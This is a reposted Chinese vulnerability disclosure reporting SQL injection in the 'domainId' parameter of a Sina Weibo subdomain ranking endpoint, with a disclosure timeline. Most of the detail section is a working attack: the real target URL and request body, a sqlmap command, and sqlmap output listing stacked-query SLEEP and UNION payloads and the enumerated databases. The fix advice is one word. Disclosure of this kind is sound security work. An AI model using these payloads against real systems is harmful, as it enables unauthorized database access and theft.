神刀安全网

漏洞标题: 新浪微博某分站再次发现一枚SQL注入

漏洞详情

披露状态:

2016-04-19: 细节已通知厂商并且等待厂商处理中
2016-04-21: 厂商已经确认,细节仅向厂商公开
2016-05-01: 细节向核心白帽子及相关领域专家公开
2016-05-11: 细节向普通白帽子公开
2016-05-21: 细节向实习白帽子公开
2016-06-05: 细节向公众公开

简要描述:

rt

详细说明:

之前没有扫出来

看来应该是新增的功能

code 区域
POST: http://v6.bang.weibo.com/aj/gongyi/rank?ajwvr=6&__rnd=1460968054871

code 区域
period=day&pagesize=20&page=2&domainId=a&_t=0

code 区域
referer: http://v6.bang.weibo.com

domainId存在注入

code 区域
python sqlmap.py -r ./post.txt -p domainId --dbs

code 区域
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: domainId (POST)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: period=day&pagesize=20&page=2&domainId=a';(SELECT * FROM (SELECT(SLEEP(5)))wNHv)#&_t=0

Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: period=day&pagesize=20&page=2&domainId=a' UNION ALL SELECT NULL,NULL,CONCAT(0x717a707071,0x48585a61524871536143,0x716a7a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &_t=0
---
[23:27:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[23:27:18] [INFO] fetching database names
[23:27:18] [INFO] the SQL query used returns 3 entries
[23:27:18] [INFO] resumed: information_schema
[23:27:18] [INFO] resumed: test
[23:27:18] [INFO] resumed: top
available databases [3]:
[*] information_schema
[*] test
[*] top

漏洞证明:

已证明

修复方案:

过滤

版权声明:转载请注明来源 蓝冰@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 新浪微博某分站再次发现一枚SQL注入

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址